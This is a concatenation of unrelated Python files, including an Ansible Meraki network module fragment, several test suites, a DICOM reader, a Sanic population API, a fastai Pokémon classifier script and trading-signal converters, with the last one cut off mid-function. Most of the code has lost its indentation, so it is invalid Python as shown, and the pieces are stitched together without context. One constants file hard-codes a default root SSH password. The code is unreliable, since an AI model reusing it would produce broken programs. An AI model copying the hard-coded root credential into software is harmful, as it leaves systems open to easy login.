meraki.fail_json(msg='net_name and net_id are mutually exclusive')
# if the user is working with this module in only check mode we do not
# want to make any changes to the environment, just return the current
# state with no modifications
if module.check_mode:
return meraki.result
# Construct payload
if meraki.params['state'] == 'present':
payload = dict()
if meraki.params['net_name']:
payload['name'] = meraki.params['net_name']
if meraki.params['type']:
payload['type'] = list_to_string(meraki.params['type'])
if meraki.params['tags']:
payload['tags'] = construct_tags(meraki.params['tags'])
if meraki.params['timezone']:
payload['timeZone'] = meraki.params['timezone']
if meraki.params['disable_my_meraki'] is not None:
payload['disableMyMerakiCom'] = meraki.params['disable_my_meraki']
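        # Example of a resulting payload with illustrative values only:
        #   {'name': 'MyNet', 'type': 'switch appliance',
        #    'tags': ' production chicago ', 'timeZone': 'America/Chicago'}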
# manipulate or modify the state as needed (this is going to be the
# part where your module will do what it needs to do)
org_id = meraki.params['org_id']
if not org_id:
org_id = meraki.get_org_id(meraki.params['org_name'])
nets = meraki.get_nets(org_id=org_id)
# check if network is created
net_id = meraki.params['net_id']
net_exists = False
if net_id is not None:
if is_net_valid(nets, net_id=net_id) is False:
meraki.fail_json(msg="Network specified by net_id does not exist.")
net_exists = True
elif meraki.params['net_name']:
if is_net_valid(nets, net_name=meraki.params['net_name']) is True:
net_id = meraki.get_net_id(net_name=meraki.params['net_name'], data=nets)
net_exists = True
if meraki.params['state'] == 'query':
if not meraki.params['net_name'] and not meraki.params['net_id']:
meraki.result['data'] = nets
elif meraki.params['net_name'] or meraki.params['net_id'] is not None:
meraki.result['data'] = meraki.get_net(meraki.params['org_name'],
meraki.params['net_name'],
data=nets
)
elif meraki.params['state'] == 'present':
if net_exists is False: # Network needs to be created
if 'type' not in meraki.params or meraki.params['type'] is None:
meraki.fail_json(msg="type parameter is required when creating a network.")
path = meraki.construct_path('create',
org_id=org_id
)
r = meraki.request(path,
method='POST',
payload=json.dumps(payload)
)
if meraki.status == 201:
meraki.result['data'] = r
meraki.result['changed'] = True
else:
net = meraki.get_net(meraki.params['org_name'], meraki.params['net_name'], data=nets, net_id=net_id)
# meraki.fail_json(msg="compare", net=net, payload=payload)
if meraki.is_update_required(net, payload):
path = meraki.construct_path('update', net_id=net_id)
r = meraki.request(path,
method='PUT',
payload=json.dumps(payload))
if meraki.status == 200:
meraki.result['data'] = r
meraki.result['changed'] = True
elif meraki.params['state'] == 'absent':
if is_net_valid(nets, net_id=net_id) is True:
path = meraki.construct_path('delete', net_id=net_id)
r = meraki.request(path, method='DELETE')
if meraki.status == 204:
meraki.result['changed'] = True
    # in the event of a successful module execution, simply call
    # AnsibleModule.exit_json(), passing the key/value results
meraki.exit_json(**meraki.result)
if __name__ == '__main__':
main()
|
# ---------------------------------------------
# Calibration of predicted probabilities.
# ---------------------------------------------
import numpy as np
import pandas as pd
import sklearn
from . import utils
class SoftMaxCalibration:
def __init__(self, num_calibration, num_bins):
self._num_calibration = num_calibration
self._num_bins = num_bins
def train_calibration(self, zs, ys):
self._softmax = utils.get_softmax(zs, ys)
def calibrate(self, zs):
return self._softmax(zs)
class SigmoidCalibration:
def __init__(self, num_calibration, num_bins):
self._num_calibration = num_calibration
self._num_bins = num_bins
def train_calibration(self, zs, ys):
self._sigmoid = utils.get_sigmoid(zs, ys)
def calibrate(self, zs):
return self._sigmoid(zs)
class ProbabilityCalibration():
def _fit_multiclass(self, X, y, verbose=False):
"""Fit the calibrated model in multiclass setting
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data.
y : array-like, shape (n_samples,)
Target values.
Returns
-------
self : object
Returns an instance of self.
"""
    def _fit_multilabel(self, X, y, verbose=False):
        """Fit the calibrated model in multilabel setting
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data.
y : array-like, shape (n_samples,)
Target values.
Returns
-------
self : object
Returns an instance of self.
"""
def predict_proba(self, X):
"""Posterior probabilities of classification
This function returns posterior probabilities of classification
according to each class on an array of test vectors X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The samples.
Returns
-------
C : array, shape (n_samples, n_classes)
The predicted probas.
"""
def output():
print("test package output!")
|
from harstorage.tests import *
class TestChartController(TestController):
"""
Test suite for chart export
"""
def test_01_export_svg(self):
"""Export SVG"""
# Expected valid image
with open("harstorage/tests/functional/testdata/validfile.svg") as file:
response = self.app.post(
url(controller="chart", action="export"),
params={"svg": file.read(), "type": "image/svg+xml",
"filename": "timeline", "width": 960},
status=200)
# Response header
assert response.content_type == "image/svg+xml"
def test_02_export_png(self):
"""Export PNG"""
# Expected valid image
with open("harstorage/tests/functional/testdata/validfile.svg") as file:
response = self.app.post(
url(controller="chart", action="export"),
params={"svg": file.read(), "type": "image/png",
"filename": "timeline", "width": 960},
status=200)
# Response header
assert response.content_type == "image/png"
|
from django.db import models
from cached_fields.fields import CachedIntegerField
from cached_fields.mixins import CachedFieldsMixin
from prefetchapp.handlers import OrderSummaryCacheHandler
class OrderSummary(models.Model):
total = CachedIntegerField(OrderSummaryCacheHandler, null=True)
class Service(models.Model):
total = models.IntegerField()
order = models.ForeignKey(OrderSummary, related_name="services", on_delete=models.CASCADE)
|
import numpy as np
import pickle
with open('sum_rew_final_policy.pkl','rb') as f:
li = pickle.load(f)
ch = np.array(li)
catastrophes = np.sum(ch<-1000)
opt = np.sum((ch>(max(li)-20))&(ch <= max(li)))
print('first 300 rollouts')
print(li[:300])
print('min rew', min(li))
print('max rew', max(li))
print('mean rew',np.mean(ch))
print('number of opt episodes', opt)
print('number of catastrophes', catastrophes)
print('percent catastrophes', catastrophes/len(li))
|
import numpy as np
import shutil
import os
from os.path import join
from tempfile import mkdtemp
from pysph import has_h5py
try:
# This is for Python-2.6.x
from unittest2 import TestCase, main, skipUnless
except ImportError:
from unittest import TestCase, main, skipUnless
from pysph.base.utils import get_particle_array, get_particle_array_wcsph
from pysph.solver.utils import dump, load, dump_v1, get_files
class TestGetFiles(TestCase):
def setUp(self):
self.root = mkdtemp()
self.fname = 'dam_break_2d'
self.dirname = join(self.root, self.fname + '_output')
os.mkdir(self.dirname)
self.files = [
join(
self.dirname,
self.fname+'_'+str(i)+'.npz'
)
for i in range(11)
]
for name in self.files:
with open(name, 'w') as fp:
fp.write('')
def test_get_files(self):
self.assertEqual(get_files(self.dirname), self.files)
self.assertEqual(get_files(self.dirname, fname=self.fname), self.files)
self.assertEqual(
get_files(
self.dirname,
fname=self.fname,
endswith=('npz', 'hdf5')
),
self.files
)
def tearDown(self):
shutil.rmtree(self.root)
class TestOutputNumpy(TestCase):
def setUp(self):
self.root = mkdtemp()
def tearDown(self):
shutil.rmtree(self.root)
def _get_filename(self, fname):
return join(self.root, fname) + '.npz'
def test_dump_and_load_works_by_default(self):
x = np.linspace(0, 1.0, 10)
y = x*2.0
dt = 1.0
pa = get_particle_array(name='fluid', x=x, y=y)
fname = self._get_filename('simple')
dump(fname, [pa], solver_data={'dt': dt})
data = load(fname)
solver_data = data['solver_data']
arrays = data['arrays']
pa1 = arrays['fluid']
self.assertListEqual(list(solver_data.keys()), ['dt'])
self.assertListEqual(list(sorted(pa.properties.keys())),
list(sorted(pa1.properties.keys())))
self.assertTrue(np.allclose(pa.x, pa1.x, atol=1e-14))
self.assertTrue(np.allclose(pa.y, pa1.y, atol=1e-14))
def test_dump_and_load_works_with_compress(self):
x = np.linspace(0, 1.0, 10)
y = x*2.0
dt = 1.0
pa = get_particle_array(name='fluid', x=x, y=y)
fname = self._get_filename('simple')
dump(fname, [pa], solver_data={'dt': dt})
fnamez = self._get_filename('simplez')
dump(fnamez, [pa], solver_data={'dt': dt}, compress=True)
# Check that the file size is indeed smaller
self.assertTrue(os.stat(fnamez).st_size < os.stat(fname).st_size)
data = load(fnamez)
solver_data = data['solver_data']
arrays = data['arrays']
pa1 = arrays['fluid']
self.assertListEqual(list(solver_data.keys()), ['dt'])
self.assertListEqual(list(sorted(pa.properties.keys())),
list(sorted(pa1.properties.keys())))
self.assertTrue(np.allclose(pa.x, pa1.x, atol=1e-14))
self.assertTrue(np.allclose(pa.y, pa1.y, atol=1e-14))
def test_dump_and_load_with_partial_data_dump(self):
x = np.linspace(0, 1.0, 10)
y = x*2.0
pa = get_particle_array_wcsph(name='fluid', x=x, y=y)
pa.set_output_arrays(['x', 'y'])
fname = self._get_filename('simple')
dump(fname, [pa], solver_data={})
data = load(fname)
arrays = data['arrays']
pa1 = arrays['fluid']
self.assertListEqual(list(sorted(pa.properties.keys())),
list(sorted(pa1.properties.keys())))
self.assertTrue(np.allclose(pa.x, pa1.x, atol=1e-14))
self.assertTrue(np.allclose(pa.y, pa1.y, atol=1e-14))
def test_dump_and_load_with_constants(self):
x = np.linspace(0, 1.0, 10)
y = x*2.0
pa = get_particle_array_wcsph(name='fluid', x=x, y=y,
constants={'c1': 1.0, 'c2': [2.0, 3.0]})
pa.set_output_arrays(['x', 'y'])
fname = self._get_filename('simple')
dump(fname, [pa], solver_data={})
data = load(fname)
arrays = data['arrays']
pa1 = arrays['fluid']
self.assertListEqual(list(sorted(pa.properties.keys())),
list(sorted(pa1.properties.keys())))
self.assertListEqual(list(sorted(pa.constants.keys())),
list(sorted(pa1.constants.keys())))
self.assertTrue(np.allclose(pa.x, pa1.x, atol=1e-14))
self.assertTrue(np.allclose(pa.y, pa1.y, atol=1e-14))
self.assertTrue(np.allclose(pa.c1, pa1.c1, atol=1e-14))
self.assertTrue(np.allclose(pa.c2, pa1.c2, atol=1e-14))
def test_that_output_array_information_is_saved(self):
# Given
x = np.linspace(0, 1.0, 10)
y = x*2.0
pa = get_particle_array(name='fluid', x=x, y=y, u=3*x)
# When
output_arrays = ['x', 'y', 'u']
pa.set_output_arrays(output_arrays)
fname = self._get_filename('simple')
dump(fname, [pa], solver_data={})
data = load(fname)
pa1 = data['arrays']['fluid']
# Then.
self.assertEqual(set(pa.output_property_arrays), set(output_arrays))
self.assertEqual(set(pa1.output_property_arrays), set(output_arrays))
class TestOutputHdf5(TestOutputNumpy):
@skipUnless(has_h5py(), "h5py module is not present")
def setUp(self):
super(TestOutputHdf5, self).setUp()
def _get_filename(self, fname):
return join(self.root, fname) + '.hdf5'
class TestOutputNumpyV1(TestCase):
def setUp(self):
self.root = mkdtemp()
def tearDown(self):
shutil.rmtree(self.root)
def _get_filename(self, fname):
return join(self.root, fname) + '.npz'
def test_load_works_with_dump_version1(self):
x = np.linspace(0, 1.0, 10)
y = x*2.0
pa = get_particle_array(name='fluid', x=x, y=y)
fname = self._get_filename('simple')
dump_v1(fname, [pa], solver_data={})
data = load(fname)
arrays = data['arrays']
pa1 = arrays['fluid']
self.assertListEqual(list(sorted(pa.properties.keys())),
list(sorted(pa1.properties.keys())))
self.assertTrue(np.allclose(pa.x, pa1.x, atol=1e-14))
self.assertTrue(np.allclose(pa.y, pa1.y, atol=1e-14))
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from .version import __version__
SEPARATOR = u'$_$'
TEST_REQUEST = u'ping'
VERSION = __version__
DEFAULT_SSH_PORT = u'22'
DEFAULT_SSH_USERNAME = u'root'
DEFAULT_SSH_PASSWORD = u'CleepR00t'
|
from django.urls import path
from blog import views
urlpatterns = [
path("", views.index),
path("article/<int:id>/", views.detail),
]
|
import numpy
import structlog
from gost.utils import evaluate, evaluate_themes, evaluate_nulls, FmaskThemes
from gost.data_model import Measurement
_LOG = structlog.get_logger("fmask")
def test_evaluate_themes_identical(
ref_fmask_measurement1: Measurement, test_fmask_measurement1: Measurement
):
"""Test that the result indicates no pixel has changed categorical state."""
truth = {
"null_2_null": 100.0,
"null_2_clear": 0.0,
"null_2_cloud": 0.0,
"null_2_cloud_shadow": 0.0,
"null_2_snow": 0.0,
"null_2_water": 0.0,
"clear_2_null": 0.0,
"clear_2_clear": 100.0,
"clear_2_cloud": 0.0,
"clear_2_cloud_shadow": 0.0,
"clear_2_snow": 0.0,
"clear_2_water": 0.0,
"cloud_2_null": 0.0,
"cloud_2_clear": 0.0,
"cloud_2_cloud": 100.0,
"cloud_2_cloud_shadow": 0.0,
"cloud_2_snow": 0.0,
"cloud_2_water": 0.0,
"cloud_shadow_2_null": 0.0,
"cloud_shadow_2_clear": 0.0,
"cloud_shadow_2_cloud": 0.0,
"cloud_shadow_2_cloud_shadow": 100.0,
"cloud_shadow_2_snow": 0.0,
"cloud_shadow_2_water": 0.0,
"snow_2_null": 0.0,
"snow_2_clear": 0.0,
"snow_2_cloud": 0.0,
"snow_2_cloud_shadow": 0.0,
"snow_2_snow": 100.0,
"snow_2_water": 0.0,
"water_2_null": 0.0,
"water_2_clear": 0.0,
"water_2_cloud": 0.0,
"water_2_cloud_shadow": 0.0,
"water_2_snow": 0.0,
"water_2_water": 100.0,
}
result = evaluate_themes(ref_fmask_measurement1, test_fmask_measurement1, FmaskThemes)
assert result == truth
def test_evaluate_themes_change(
ref_fmask_measurement2: Measurement, test_fmask_measurement3: Measurement
):
"""Test that the result indicates pixels have changed categorical state."""
truth = {
"null_2_null": 28.57142857142857,
"null_2_clear": 14.285714285714285,
"null_2_cloud": 14.285714285714285,
"null_2_cloud_shadow": 14.285714285714285,
"null_2_snow": 14.285714285714285,
"null_2_water": 14.285714285714285,
"clear_2_null": 14.285714285714285,
"clear_2_clear": 28.57142857142857,
"clear_2_cloud": 14.285714285714285,
"clear_2_cloud_shadow": 14.285714285714285,
"clear_2_snow": 14.285714285714285,
"clear_2_water": 14.285714285714285,
"cloud_2_null": 14.285714285714285,
"cloud_2_clear": 14.285714285714285,
"cloud_2_cloud": 28.57142857142857,
"cloud_2_cloud_shadow": 14.285714285714285,
"cloud_2_snow": 14.285714285714285,
"cloud_2_water": 14.285714285714285,
"cloud_shadow_2_null": 14.285714285714285,
"cloud_shadow_2_clear": 14.285714285714285,
"cloud_shadow_2_cloud": 14.285714285714285,
"cloud_shadow_2_cloud_shadow": 28.57142857142857,
"cloud_shadow_2_snow": 14.285714285714285,
"cloud_shadow_2_water": 14.285714285714285,
"snow_2_null": 14.285714285714285,
"snow_2_clear": 14.285714285714285,
"snow_2_cloud": 14.285714285714285,
"snow_2_cloud_shadow": 14.285714285714285,
"snow_2_snow": 28.57142857142857,
"snow_2_water": 14.285714285714285,
"water_2_null": 14.285714285714285,
"water_2_clear": 14.285714285714285,
"water_2_cloud": 14.285714285714285,
"water_2_cloud_shadow": 14.285714285714285,
"water_2_snow": 14.285714285714285,
"water_2_water": 28.57142857142857,
}
result = evaluate_themes(ref_fmask_measurement2, test_fmask_measurement3, FmaskThemes)
assert result == truth
def test_evaluate_nulls(
ref_reflectance_measurement: Measurement, test_reflectance_measurement1: Measurement
):
"""Test that the two measurements have identical null locations"""
v_2_null, null_2_v = evaluate_nulls(
ref_reflectance_measurement, test_reflectance_measurement1
)
assert v_2_null == 0.0
assert null_2_v == 0.0
def test_evaluate_nulls_change(
ref_reflectance_measurement: Measurement, test_reflectance_measurement2: Measurement
):
"""Test that the two measurements have different null locations"""
v_2_null, null_2_v = evaluate_nulls(
ref_reflectance_measurement, test_reflectance_measurement2
)
assert v_2_null == 0.25
assert null_2_v == 0.125
def test_evaluate_reflectance(
ref_reflectance_measurement: Measurement, test_reflectance_measurement2: Measurement
):
"""Test that the two measurements return zero difference for all pixels."""
result = evaluate(ref_reflectance_measurement, test_reflectance_measurement2)
assert numpy.count_nonzero(result) == 0
def test_evaluate_reflectance_change(
ref_reflectance_measurement: Measurement, test_reflectance_measurement3: Measurement
):
"""Test that the two measurements have all different values."""
result = evaluate(ref_reflectance_measurement, test_reflectance_measurement3)
assert numpy.count_nonzero(result) == 8
|
# Copyright 2008-2018 pydicom authors. See LICENSE file for details.
"""Read a dicom media file"""
import os
from struct import Struct, unpack
from types import TracebackType
from typing import (
Iterator, Tuple, Optional, Union, Type, cast, BinaryIO, Callable
)
from pydicom.misc import size_in_bytes
from pydicom.datadict import dictionary_VR
from pydicom.tag import TupleTag, ItemTag
from pydicom.uid import UID
from pydicom.valuerep import extra_length_VRs
extra_length_VRs_b = tuple(vr.encode('ascii') for vr in extra_length_VRs)
ExplicitVRLittleEndian = b'1.2.840.10008.1.2.1'
ImplicitVRLittleEndian = b'1.2.840.10008.1.2'
DeflatedExplicitVRLittleEndian = b'1.2.840.10008.1.2.1.99'
ExplicitVRBigEndian = b'1.2.840.10008.1.2.2'
_ElementType = Tuple[
Tuple[int, int], Optional[bytes], int, Optional[bytes], int
]
class dicomfile:
"""Context-manager based DICOM file object with data element iteration"""
def __init__(self, filename: Union[str, bytes, os.PathLike]) -> None:
self.fobj = fobj = open(filename, "rb")
# Read the DICOM preamble, if present
self.preamble: Optional[bytes] = fobj.read(0x80)
dicom_prefix = fobj.read(4)
if dicom_prefix != b"DICM":
self.preamble = None
fobj.seek(0)
def __enter__(self) -> "dicomfile":
return self
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]
) -> Optional[bool]:
self.fobj.close()
return None
def __iter__(self) -> Iterator[_ElementType]:
# Need the transfer_syntax later
tsyntax: Optional[UID] = None
# Yield the file meta info elements
file_meta = data_element_generator(
self.fobj,
is_implicit_VR=False,
is_little_endian=True,
stop_when=lambda group, elem: group != 2
)
for elem in file_meta:
if elem[0] == (0x0002, 0x0010):
value = cast(bytes, elem[3])
tsyntax = UID(value.strip(b" \0").decode('ascii'))
yield elem
# Continue to yield elements from the main data
if not tsyntax:
raise NotImplementedError("No transfer syntax in file meta info")
ds_gen = data_element_generator(
self.fobj, tsyntax.is_implicit_VR, tsyntax.is_little_endian
)
for elem in ds_gen:
yield elem
def data_element_generator(
fp: BinaryIO,
is_implicit_VR: bool,
is_little_endian: bool,
stop_when: Optional[Callable[[int, int], bool]] = None,
defer_size: Optional[Union[str, int, float]] = None,
) -> Iterator[_ElementType]:
""":return: (tag, VR, length, value, value_tell,
is_implicit_VR, is_little_endian)
"""
endian_chr = "<" if is_little_endian else ">"
if is_implicit_VR:
element_struct = Struct(endian_chr + "HHL")
else: # Explicit VR
# tag, VR, 2-byte length (or 0 if special VRs)
element_struct = Struct(endian_chr + "HH2sH")
extra_length_struct = Struct(endian_chr + "L") # for special VRs
extra_length_unpack = extra_length_struct.unpack # for lookup speed
# Make local variables so have faster lookup
fp_read = fp.read
fp_tell = fp.tell
element_struct_unpack = element_struct.unpack
defer_size = size_in_bytes(defer_size)
while True:
# Read tag, VR, length, get ready to read value
bytes_read = fp_read(8)
if len(bytes_read) < 8:
return # at end of file
if is_implicit_VR:
# must reset VR each time; could have set last iteration (e.g. SQ)
VR = None
group, elem, length = element_struct_unpack(bytes_read)
else: # explicit VR
group, elem, VR, length = element_struct_unpack(bytes_read)
if VR in extra_length_VRs_b:
length = extra_length_unpack(fp_read(4))[0]
# Positioned to read the value, but may not want to -- check stop_when
value_tell = fp_tell()
if stop_when is not None:
if stop_when(group, elem):
rewind_length = 8
if not is_implicit_VR and VR in extra_length_VRs_b:
rewind_length += 4
fp.seek(value_tell - rewind_length)
return
# Reading the value
# First case (most common): reading a value with a defined length
if length != 0xFFFFFFFF:
if defer_size is not None and length > defer_size:
# Flag as deferred by setting value to None, and skip bytes
value = None
fp.seek(fp_tell() + length)
else:
value = fp_read(length)
yield ((group, elem), VR, length, value, value_tell)
# Second case: undefined length - must seek to delimiter,
# unless is SQ type, in which case is easier to parse it, because
# undefined length SQs and items of undefined lengths can be nested
# and it would be error-prone to read to the correct outer delimiter
else:
# Try to look up type to see if is a SQ
# if private tag, won't be able to look it up in dictionary,
# in which case just ignore it and read the bytes unless it is
# identified as a Sequence
if VR is None:
try:
VR = dictionary_VR((group, elem)).encode('ascii')
except KeyError:
# Look ahead to see if it consists of items and
# is thus a SQ
next_tag = TupleTag(
cast(
Tuple[int, int],
unpack(endian_chr + "HH", fp_read(4)),
)
)
# Rewind the file
fp.seek(fp_tell() - 4)
if next_tag == ItemTag:
VR = b'SQ'
if VR == b'SQ':
yield ((group, elem), VR, length, None, value_tell)
else:
raise NotImplementedError(
"This reader does not handle undefined length except for "
"SQ"
)
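# Illustrative usage sketch (the file name is hypothetical). The iterator
# yields ((group, elem), VR, length, value, value_tell) tuples:
#   with dicomfile("ct_image.dcm") as ds:
#       for (group, elem), VR, length, value, value_tell in ds:
#           print(hex(group), hex(elem), VR, length)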
|
import json
import numpy as np
from sanic import Sanic
from sanic import response
from geojson import Polygon
from shapely import geometry as geo
app = Sanic("PopulationDataInquireServer")
def fetchPopulationFromFile(lon, lat):
global data
x = int((lat + 90) * 5)
y = int((lon + 180) * 5)
return float(data[x][y])
def calcPopulation(polygon: Polygon):
global step, cellarea
p = geo.Polygon(polygon["coordinates"][0])
lonMin, latMin, lonMax, latMax = p.bounds
resultlist = list()
for lat in np.arange(latMin, latMax, step, dtype=np.float64):
for lon in np.arange(lonMin, lonMax, step, dtype=np.float64):
cellLon1 = lon - lon % step - step
cellLon2 = lon - lon % step + step
cellLat1 = lat - lat % step - step
cellLat2 = lat - lat % step + step
cellPolygon = geo.Polygon(
[
(cellLon1, cellLat1),
(cellLon2, cellLat1),
(cellLon2, cellLat2),
(cellLon1, cellLat2),
]
)
intersection = cellPolygon.intersection(p)
if not intersection.is_empty:
curpop = fetchPopulationFromFile(cellLon1, cellLat1)
if curpop > 0.0:
resultlist.append(
{
"lonlat": [lon, lat],
"population": (intersection.area / cellarea) * curpop,
}
)
return resultlist
@app.listener("before_server_start")
async def open_file(app, loop):
global data
data = np.loadtxt("datagrid.asc", dtype=np.float64, skiprows=0)
@app.post("/api")
async def postapi(request):
p = Polygon.to_instance(json.loads(request.body))
resultlist = calcPopulation(p)
return response.json(body=resultlist)
if __name__ == "__main__":
data = None
step = 360 / 1800
cellarea = geo.Polygon([(0, 0), (0, step), (step, step), (step, 0)]).area
app.run(host="127.0.0.1", port=8080)
|
from pathlib import Path
from fastai.vision.widgets import *
from fastbook import *
def search_images_bing(key, term, max_images: int = 100, **kwargs):
params = {'q':term, 'count':max_images}
headers = {"Ocp-Apim-Subscription-Key":key}
search_url = "https://api.bing.microsoft.com/v7.0/images/search"
response = requests.get(search_url, headers=headers, params=params)
response.raise_for_status()
search_results = response.json()
return L(search_results['value'])
def prediction():
path = Path()
learn_inf = load_learner(path/'export.pkl')
prediction = learn_inf.predict('test.jpg')
return f"{prediction[0]} with probability {max(prediction[-1]):.4}"
poke_types = 'bulbasaur', 'ivysaur', 'venusaur', 'charmander', 'charmeleon', 'charizard', 'squirtle', 'wartortle', 'blastoise', 'caterpie', 'metapod', 'butterfree', 'weedle', 'kakuna', 'beedrill', 'pidgey', 'pidgeotto', 'pidgeot', 'rattata', 'raticate', 'spearow', 'fearow', 'ekans', 'arbok', 'pikachu', 'raichu', 'sandshrew', 'sandslash', 'nidoran-f', 'nidorina', 'nidoqueen', 'nidoran-m', 'nidorino', 'nidoking', 'clefairy', 'clefable', 'vulpix', 'ninetales', 'jigglypuff', 'wigglytuff', 'zubat', 'golbat', 'oddish', 'gloom', 'vileplume', 'paras', 'parasect', 'venonat', 'venomoth', 'diglett', 'dugtrio', 'meowth', 'persian', 'psyduck', 'golduck', 'mankey', 'primeape', 'growlithe', 'arcanine', 'poliwag', 'poliwhirl', 'poliwrath', 'abra', 'kadabra', 'alakazam', 'machop', 'machoke', 'machamp', 'bellsprout', 'weepinbell', 'victreebel', 'tentacool', 'tentacruel', 'geodude', 'graveler', 'golem', 'ponyta', 'rapidash', 'slowpoke', 'slowbro', 'magnemite', 'magneton', 'farfetchd', 'doduo', 'dodrio', 'seel', 'dewgong', 'grimer', 'muk', 'shellder', 'cloyster', 'gastly', 'haunter', 'gengar', 'onix', 'drowzee', 'hypno', 'krabby', 'kingler', 'voltorb', 'electrode', 'exeggcute', 'exeggutor', 'cubone', 'marowak', 'hitmonlee', 'hitmonchan', 'lickitung', 'koffing', 'weezing', 'rhyhorn', 'rhydon', 'chansey', 'tangela', 'kangaskhan', 'horsea', 'seadra', 'goldeen', 'seaking', 'staryu', 'starmie', 'mr-mime', 'scyther', 'jynx', 'electabuzz', 'magmar', 'pinsir', 'tauros', 'magikarp', 'gyarados', 'lapras', 'ditto', 'eevee', 'vaporeon', 'jolteon', 'flareon', 'porygon', 'omanyte', 'omastar', 'kabuto', 'kabutops', 'aerodactyl', 'snorlax', 'articuno', 'zapdos', 'moltres', 'dratini', 'dragonair', 'dragonite', 'mewtwo', 'mew'
setup_book()
key = os.environ.get('AZURE_SEARCH_KEY', 'XXX')
path = Path('./pokemon')
c = 0
if path.exists():
for o in poke_types:
dest = (path/o)
dest.mkdir(exist_ok=True)
results = search_images_bing(key, f'{o}')
download_images(dest, urls=results.attrgot('contentUrl'), max_pics=1000)
print(f"\r{c}{o}", end="")
c+=1
fns = get_image_files(path)
print(fns)
failed = verify_images(fns)
print(failed)
failed.map(Path.unlink)
pokemon = DataBlock(
blocks=(ImageBlock, CategoryBlock),
get_items=get_image_files,
splitter=RandomSplitter(valid_pct=0.2, seed=42),
get_y=parent_label,
item_tfms=Resize(256))
dls = pokemon.dataloaders(path)
dls.valid.show_batch(max_n=10, nrows=1)
pokemon = pokemon.new(item_tfms=RandomResizedCrop(128, min_scale=.2), batch_tfms=aug_transforms(mult=3))
dls = pokemon.dataloaders(path)
dls.train.show_batch(max_n=8, nrows=2, unique=True)
pokemon= pokemon.new(item_tfms=RandomResizedCrop(256, min_scale=0.2),batch_tfms=aug_transforms(mult=3))
dls = pokemon.dataloaders(path)
learn = cnn_learner(dls, resnet101 , metrics=error_rate)
learn.fine_tune(16)
interp = ClassificationInterpretation.from_learner(learn)
interp.plot_confusion_matrix()
interp.plot_top_losses(5, nrows=1)
cleaner = ImageClassifierCleaner(learn)
for idx in cleaner.delete():
try:
cleaner.fns[idx].unlink()
    except Exception:
pass
for idx,cat in cleaner.change(): shutil.move(str(cleaner.fns[idx]), path/cat)
learn.export(path/'export.pkl')
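# Note: the learner is exported to path/'export.pkl' ('./pokemon/export.pkl'),
# while prediction() above loads 'export.pkl' from the current directory, so
# the exported file may need to be moved (or one of the paths adjusted) before
# prediction() is called.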
|
# -*- coding: utf-8 -*-
import numpy as np
def signal_to_class(data, n=2, normalize=True):
"""
    Converts a list of signals to an n-dimensional list of classes [buy, .., sell].
    Arguments
        data (array-like): One-dimensional sequence of signals in [-1, 1].
        n (int): Number of classes.
        normalize (bool): If True, build hard one-hot classes from the sign of
            the signal; if False, spread the signal magnitude across the classes.
Returns
Array of classes.
"""
result = np.array([])
data = np.array(data)
if len(data.shape) > 1:
raise ValueError("The array must be one-dimensional.")
if n == 2:
if normalize:
for item in data:
if item > 0: # buy
result = np.append(result, [1.0, 0.0])
if item <= 0: # sell
result = np.append(result, [0.0, 1.0])
else:
for item in data:
result = np.append(result, [0.5+item/2.0, 0.5-item/2.0])
elif n == 3:
if normalize:
for item in data:
if item > 0: # buy
result = np.append(result, [1.0, 0.0, 0.0])
if item < 0: # sell
result = np.append(result, [0.0, 0.0, 1.0])
if item == 0: # pass
result = np.append(result, [0.0, 1.0, 0.0])
else:
for item in data:
if item > 0: # buy
result = np.append(result, [abs(item), (1.0-abs(item)), 0.0])
if item < 0: # sell
result = np.append(result, [0.0, (1.0-abs(item)), abs(item)])
if item == 0: # pass
result = np.append(result, [0.0, 1.0, 0.0])
elif n == 6:
for item in data:
if item >= 0.8 and item <= 1.0:
result = np.append(result, [1.0, 0.0, 0.0, 0.0, 0.0, 0.0])
elif item >= 0.4 and item < 0.8:
result = np.append(result, [0.0, 1.0, 0.0, 0.0, 0.0, 0.0])
elif item >= 0.0 and item < 0.4:
result = np.append(result, [0.0, 0.0, 1.0, 0.0, 0.0, 0.0])
elif item > -0.4 and item < 0.0:
result = np.append(result, [0.0, 0.0, 0.0, 1.0, 0.0, 0.0])
            elif item > -0.8 and item <= -0.4:
result = np.append(result, [0.0, 0.0, 0.0, 0.0, 1.0, 0.0])
            elif item >= -1.0 and item <= -0.8:
result = np.append(result, [0.0, 0.0, 0.0, 0.0, 0.0, 1.0])
return result.reshape((data.shape[0], n))
def class_to_signal(data, n=2, normalized=True):
"""
Converts a n-dimensional list of classes to a list of signals.
"""
result = np.array([])
if n == 2:
if normalized:
for item in data:
result = np.append(result, 1 if item[0] > item[1] else -1)
else:
for item in data:
result = np.append(result, item[0] * 2 - 1.0)
elif n == 3:
if normalized:
for item in data:
_class = np.argmax(item)
if _class == 0:
result = np.append(result, 1.0)
elif _class == 1:
result = np.append(result, 0.0)
elif _class == 2:
result = np.append(result, -1.0)
else:
for item in data:
_class = np.argmax(item)
if _class == 0:
result = np.append(result, item[0])
elif _class == 1:
result = np.append(result, 0.0)
elif _class == 2:
result = np.append(result, -item[2])
elif n == 6:
for item in data:
_class = np.argmax(item)
if _class == 0:
result = np.append(result, 1.0)
elif _class == 1:
result = np.append(result, 0.66)
elif _class == 2:
result = np.append(result, 0.33)
elif _class == 3:
result = np.append(result, -0.33)
elif _class == 4:
result = np.append(result, -0.66)
elif _class == 5:
result = np.append(result, -1.0)
return result
def prepare_target(data, close_index=3, classes=6):
"""
    Builds a target series of relative close-price changes, bucketed into
    approximately uniform classes.
"""
    # TODO: the number of classes is currently fixed at 6
    classes = 6
data = np.array(data)
new_target = data[1:, close_index] / data[:-1, close_index]
new_target = np.insert(new_target, obj=0, values=[1.0])
n, bins = np.histogram(new_target, bins=200, range=(0.99, 1.01))
sixth = sum(n) / classes
points = [0., 0., 1., 0., 0.]
_sum = n[100]/2
p_idx = 1
    for idx in range(99, -1, -1):
_sum += n[idx]
if _sum >= sixth:
points[p_idx] = (idx - 100) / 10**4 + 1
p_idx -= 1
if p_idx < 0:
break
_sum = n[100]/2
p_idx = 3
for idx in range(101, 201):
_sum += n[idx]
if _sum >= sixth:
points[p_idx] = (idx - 100) / 10**4 + 1
p_idx += 1
if p_idx > 4:
break
